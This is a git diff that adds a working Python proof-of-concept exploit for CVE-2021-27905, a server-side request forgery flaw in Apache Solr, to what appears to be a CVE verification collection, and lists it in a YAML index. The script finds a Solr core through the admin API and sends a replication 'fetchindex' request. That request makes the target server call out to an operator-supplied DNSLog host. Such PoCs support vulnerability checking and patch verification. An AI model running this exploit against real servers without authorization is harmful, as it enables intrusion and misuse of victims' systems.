diff --git a/cve/apache-solr/CVE-2021-27905.py b/cve/apache-solr/CVE-2021-27905.py new file mode 100644 index 0000000000000000000000000000000000000000..7f4a64d58dfff189f6027fbd4e91a417b2d0c02b --- /dev/null +++ b/cve/apache-solr/CVE-2021-27905.py @@ -0,0 +1,82 @@ +# CVE-2021-27905 +# Apache solr ssrf + +import requests +import urllib3 +import json +import sys, getopt +urllib3.disable_warnings() + + + + +def title(): + print("[-------------------------------------------------------------]") + print("[-------------- Apache Solr SSRF漏洞 ---------------]") + print("[-------- CVE-2021-27905 ----------]") + print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]") + print("[-------- Author:Henry4E36 ------------]") + print("[-------------------------------------------------------------]") + +def commit(): + url = "" + try: + opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="]) + for op, value in opt: + if op == "-h" or op == "--help": + print(""" + [-] Apache Solr SSRF漏洞 (CVE-2021-27905) + [-] Options: + -h or --help : 方法说明 + -u or --url : 站点URL地址 + -d or --dnslog : DnsLog + """) + sys.exit(0) + elif op == "-u" or op == "--url=": + url = value + elif op == "-d" or op == "--dnslog=": + dnslog = value + else: + print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") + sys.exit() + return url, dnslog + + except Exception as e: + print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog") + sys.exit(0) + +def target_core(url): + target_url = url + "/solr/admin/cores?indexInfo=false&wt=json" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" + } + try: + res = requests.get(url=target_url,headers=headers,verify=False,timeout=5) + core = list(json.loads(res.text)["status"])[0] + return core + except Exception as e: + print(f"[!] 目标系统: {url} 出现意外!\n ",e) + +def ssrf(core,dnslog): + target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}" + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" + } + try: + res = requests.get(url=target_url, headers=headers, verify=False, timeout=5) + status = json.loads(res.text)["status"] + if res.status_code == 200 and status == "OK": + print(f"[!] \033[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!\033[0m") + else: + print(f"[0] 目标系统: {url} 不存在SSRF漏洞") + + except Exception as e: + print(f"[!] 目标系统: {url} 出现意外!\n ", e) + + +if __name__ == "__main__": + title() + url ,dnslog = commit() + core = target_core(url) + ssrf(core,dnslog) +\ No newline at end of file \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 880fd7cb42863b17e1c1592232072c8a63cc67a5..f822acc2b69f179a6e97f17564d06e258e4fe60d 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -6,6 +6,8 @@ cve: - CVE-2021-42013 apache-APISIX: - CVE-2022-24112 + apache-solr: + - CVE-2021-27905 linux-kernel: - CVE-2021-4204 - CVE-2021-22555